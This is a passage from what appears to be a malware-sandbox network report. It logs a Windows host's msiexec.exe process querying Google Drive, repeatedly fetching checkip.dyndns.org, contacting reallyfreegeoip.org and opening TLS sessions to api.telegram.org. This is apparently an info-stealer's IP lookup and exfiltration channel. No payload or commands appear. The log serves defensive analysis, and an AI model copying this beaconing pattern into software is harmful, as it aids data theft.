Feb 24, 2025 17:24:18.108591080 CET	49759	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:18.114907026 CET	80	49759	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:18.759287119 CET	80	49759	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:18.760411024 CET	49765	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:18.760464907 CET	443	49765	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:18.760535955 CET	49765	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:18.760762930 CET	49765	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:18.760777950 CET	443	49765	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:18.812277079 CET	49759	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:19.407761097 CET	443	49765	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:19.409349918 CET	49765	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:19.409374952 CET	443	49765	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:19.567764044 CET	443	49765	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:19.567835093 CET	443	49765	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:19.570591927 CET	49765	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:19.570591927 CET	49765	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:19.571386099 CET	49759	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:19.572550058 CET	49771	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:19.576901913 CET	80	49759	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:19.576999903 CET	49759	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:19.577898026 CET	80	49771	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:19.577970982 CET	49771	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:19.578031063 CET	49771	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:19.583479881 CET	80	49771	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:20.162252903 CET	80	49771	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:20.167761087 CET	49777	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:20.167819023 CET	443	49777	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:20.167968988 CET	49777	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:20.168162107 CET	49777	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:20.168175936 CET	443	49777	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:20.202976942 CET	49771	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:20.647562027 CET	443	49777	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:20.649065018 CET	49777	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:20.649111986 CET	443	49777	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:20.791110992 CET	443	49777	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:20.791203022 CET	443	49777	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:20.791340113 CET	49777	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:20.791600943 CET	49777	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:20.795650959 CET	49781	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:20.800697088 CET	80	49781	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:20.800770044 CET	49781	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:20.800921917 CET	49781	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:20.805975914 CET	80	49781	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:21.391242981 CET	80	49781	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:21.392409086 CET	49784	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:21.392446995 CET	443	49784	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:21.392508984 CET	49784	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:21.392743111 CET	49784	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:21.392757893 CET	443	49784	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:21.437294006 CET	49781	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:21.859347105 CET	443	49784	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:21.860820055 CET	49784	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:21.860860109 CET	443	49784	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:22.016834974 CET	443	49784	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:22.016905069 CET	443	49784	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:22.016979933 CET	49784	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:22.017349005 CET	49784	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:22.020335913 CET	49781	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:22.021241903 CET	49790	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:22.025594950 CET	80	49781	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:22.025676012 CET	49781	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:22.026238918 CET	80	49790	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:22.026310921 CET	49790	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:22.026403904 CET	49790	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:22.031433105 CET	80	49790	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:22.616147995 CET	80	49790	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:22.617336988 CET	49796	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:22.617388010 CET	443	49796	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:22.617470026 CET	49796	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:22.617691040 CET	49796	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:22.617707014 CET	443	49796	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:22.656580925 CET	49790	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:23.099921942 CET	443	49796	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:23.107997894 CET	49796	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:23.108020067 CET	443	49796	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:23.451812029 CET	443	49796	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:23.451883078 CET	443	49796	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:23.451936007 CET	49796	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:23.452282906 CET	49796	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:23.461250067 CET	49790	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:23.462423086 CET	49802	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:23.466499090 CET	80	49790	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:23.466553926 CET	49790	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:23.467479944 CET	80	49802	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:23.467734098 CET	49802	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:23.467814922 CET	49802	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:23.472775936 CET	80	49802	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:24.040095091 CET	80	49802	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:24.041373014 CET	49807	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:24.041404963 CET	443	49807	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:24.041474104 CET	49807	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:24.041691065 CET	49807	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:24.041704893 CET	443	49807	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:24.093653917 CET	49802	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:24.537357092 CET	443	49807	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:24.540533066 CET	49807	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:24.540559053 CET	443	49807	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:24.704334974 CET	443	49807	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:24.704407930 CET	443	49807	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:24.704485893 CET	49807	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:24.704893112 CET	49807	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:24.707856894 CET	49802	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:24.708812952 CET	49809	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:24.713110924 CET	80	49802	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:24.713922024 CET	80	49809	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:24.713994980 CET	49802	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:24.714026928 CET	49809	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:24.714117050 CET	49809	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:24.719074965 CET	80	49809	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:25.317548990 CET	80	49809	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:25.326129913 CET	49815	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:25.326189995 CET	443	49815	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:25.326276064 CET	49815	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:25.326541901 CET	49815	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:25.326553106 CET	443	49815	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:25.359189987 CET	49809	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:25.781851053 CET	443	49815	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:25.795372009 CET	49815	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:25.795388937 CET	443	49815	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:25.936950922 CET	443	49815	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:25.937006950 CET	443	49815	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:25.937053919 CET	49815	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:25.937819004 CET	49815	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:26.019867897 CET	49809	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:26.020970106 CET	49820	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:26.025274992 CET	80	49809	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:26.025336981 CET	49809	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:26.026011944 CET	80	49820	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:26.026093006 CET	49820	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:26.026154995 CET	49820	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:26.031141996 CET	80	49820	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:26.623707056 CET	80	49820	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:26.624690056 CET	49822	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:26.624737024 CET	443	49822	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:26.624835968 CET	49822	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:26.625813961 CET	49822	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:26.625829935 CET	443	49822	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:26.671696901 CET	49820	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:27.081294060 CET	443	49822	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:27.083014965 CET	49822	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:27.083055019 CET	443	49822	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:27.221596956 CET	443	49822	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:27.221764088 CET	443	49822	104.21.32.1	192.168.2.4
Feb 24, 2025 17:24:27.222004890 CET	49822	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:27.222297907 CET	49822	443	192.168.2.4	104.21.32.1
Feb 24, 2025 17:24:27.260565996 CET	49820	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:27.265888929 CET	80	49820	158.101.44.242	192.168.2.4
Feb 24, 2025 17:24:27.267982960 CET	49820	80	192.168.2.4	158.101.44.242
Feb 24, 2025 17:24:27.270199060 CET	49828	443	192.168.2.4	149.154.167.220
Feb 24, 2025 17:24:27.270235062 CET	443	49828	149.154.167.220	192.168.2.4
Feb 24, 2025 17:24:27.270312071 CET	49828	443	192.168.2.4	149.154.167.220
Feb 24, 2025 17:24:27.270828009 CET	49828	443	192.168.2.4	149.154.167.220
Feb 24, 2025 17:24:27.270843983 CET	443	49828	149.154.167.220	192.168.2.4
Feb 24, 2025 17:24:27.919508934 CET	443	49828	149.154.167.220	192.168.2.4
Feb 24, 2025 17:24:27.919683933 CET	49828	443	192.168.2.4	149.154.167.220
Feb 24, 2025 17:24:27.922368050 CET	49828	443	192.168.2.4	149.154.167.220
Feb 24, 2025 17:24:27.922380924 CET	443	49828	149.154.167.220	192.168.2.4
Feb 24, 2025 17:24:27.923078060 CET	443	49828	149.154.167.220	192.168.2.4
Feb 24, 2025 17:24:27.924868107 CET	49828	443	192.168.2.4	149.154.167.220
Feb 24, 2025 17:24:27.971344948 CET	443	49828	149.154.167.220	192.168.2.4
Feb 24, 2025 17:24:28.167553902 CET	443	49828	149.154.167.220	192.168.2.4
Feb 24, 2025 17:24:28.167717934 CET	443	49828	149.154.167.220	192.168.2.4
Feb 24, 2025 17:24:28.167809963 CET	49828	443	192.168.2.4	149.154.167.220
Feb 24, 2025 17:24:28.170475960 CET	49828	443	192.168.2.4	149.154.167.220
Feb 24, 2025 17:24:35.070612907 CET	49771	80	192.168.2.4	158.101.44.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 24, 2025 17:24:10.064089060 CET	55552	53	192.168.2.4	1.1.1.1
Feb 24, 2025 17:24:10.071624994 CET	53	55552	1.1.1.1	192.168.2.4
Feb 24, 2025 17:24:11.335117102 CET	63367	53	192.168.2.4	1.1.1.1
Feb 24, 2025 17:24:11.343895912 CET	53	63367	1.1.1.1	192.168.2.4
Feb 24, 2025 17:24:15.308897972 CET	55741	53	192.168.2.4	1.1.1.1
Feb 24, 2025 17:24:15.317580938 CET	53	55741	1.1.1.1	192.168.2.4
Feb 24, 2025 17:24:16.622246981 CET	60106	53	192.168.2.4	1.1.1.1
Feb 24, 2025 17:24:16.630143881 CET	53	60106	1.1.1.1	192.168.2.4
Feb 24, 2025 17:24:27.261194944 CET	58918	53	192.168.2.4	1.1.1.1
Feb 24, 2025 17:24:27.269454002 CET	53	58918	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 24, 2025 17:24:10.064089060 CET	192.168.2.4	1.1.1.1	0xc996	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Feb 24, 2025 17:24:11.335117102 CET	192.168.2.4	1.1.1.1	0xe69b	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Feb 24, 2025 17:24:15.308897972 CET	192.168.2.4	1.1.1.1	0x2a9f	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Feb 24, 2025 17:24:16.622246981 CET	192.168.2.4	1.1.1.1	0x43f2	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Feb 24, 2025 17:24:27.261194944 CET	192.168.2.4	1.1.1.1	0x2547	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 24, 2025 17:24:10.071624994 CET	1.1.1.1	192.168.2.4	0xc996	No error (0)	drive.google.com		142.250.186.46	A (IP address)	IN (0x0001)	false
Feb 24, 2025 17:24:11.343895912 CET	1.1.1.1	192.168.2.4	0xe69b	No error (0)	drive.usercontent.google.com		142.250.181.225	A (IP address)	IN (0x0001)	false
Feb 24, 2025 17:24:15.317580938 CET	1.1.1.1	192.168.2.4	0x2a9f	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 24, 2025 17:24:15.317580938 CET	1.1.1.1	192.168.2.4	0x2a9f	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Feb 24, 2025 17:24:15.317580938 CET	1.1.1.1	192.168.2.4	0x2a9f	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Feb 24, 2025 17:24:15.317580938 CET	1.1.1.1	192.168.2.4	0x2a9f	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Feb 24, 2025 17:24:15.317580938 CET	1.1.1.1	192.168.2.4	0x2a9f	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Feb 24, 2025 17:24:15.317580938 CET	1.1.1.1	192.168.2.4	0x2a9f	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Feb 24, 2025 17:24:16.630143881 CET	1.1.1.1	192.168.2.4	0x43f2	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Feb 24, 2025 17:24:16.630143881 CET	1.1.1.1	192.168.2.4	0x43f2	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Feb 24, 2025 17:24:16.630143881 CET	1.1.1.1	192.168.2.4	0x43f2	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Feb 24, 2025 17:24:16.630143881 CET	1.1.1.1	192.168.2.4	0x43f2	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Feb 24, 2025 17:24:16.630143881 CET	1.1.1.1	192.168.2.4	0x43f2	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Feb 24, 2025 17:24:16.630143881 CET	1.1.1.1	192.168.2.4	0x43f2	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Feb 24, 2025 17:24:16.630143881 CET	1.1.1.1	192.168.2.4	0x43f2	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Feb 24, 2025 17:24:27.269454002 CET	1.1.1.1	192.168.2.4	0x2547	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49741	158.101.44.242	80	7524	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 17:24:15.326503992 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Feb 24, 2025 17:24:15.890733004 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 24 Feb 2025 16:24:15 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0e3d2a575cc0308beffe98e1c7dcc16c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Feb 24, 2025 17:24:15.894089937 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Feb 24, 2025 17:24:16.288749933 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 24 Feb 2025 16:24:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3d1b86fe8208e6d24efddc0c207d60a4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Feb 24, 2025 17:24:17.244546890 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Feb 24, 2025 17:24:17.399765968 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 24 Feb 2025 16:24:17 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e01f74118c0d15fa002d6f0047b575a1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49759	158.101.44.242	80	7524	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 17:24:18.108591080 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Feb 24, 2025 17:24:18.759287119 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 24 Feb 2025 16:24:18 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ff1c8e3d0dd65f2994c93ffe805b45ca Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49771	158.101.44.242	80	7524	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 17:24:19.578031063 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Feb 24, 2025 17:24:20.162252903 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 24 Feb 2025 16:24:20 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: fb0ffe8335425d88a57d805a4314243c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49781	158.101.44.242	80	7524	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 17:24:20.800921917 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Feb 24, 2025 17:24:21.391242981 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 24 Feb 2025 16:24:21 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5f0860b396c578e2082ed24ea8dd0760 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49790	158.101.44.242	80	7524	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 17:24:22.026403904 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Feb 24, 2025 17:24:22.616147995 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 24 Feb 2025 16:24:22 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 19da4eb8ddef0de50a6d33385c3eb8ec Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49802	158.101.44.242	80	7524	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 17:24:23.467814922 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Feb 24, 2025 17:24:24.040095091 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 24 Feb 2025 16:24:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 24831f42267b302c1df860f09fe1d9cf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49809	158.101.44.242	80	7524	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
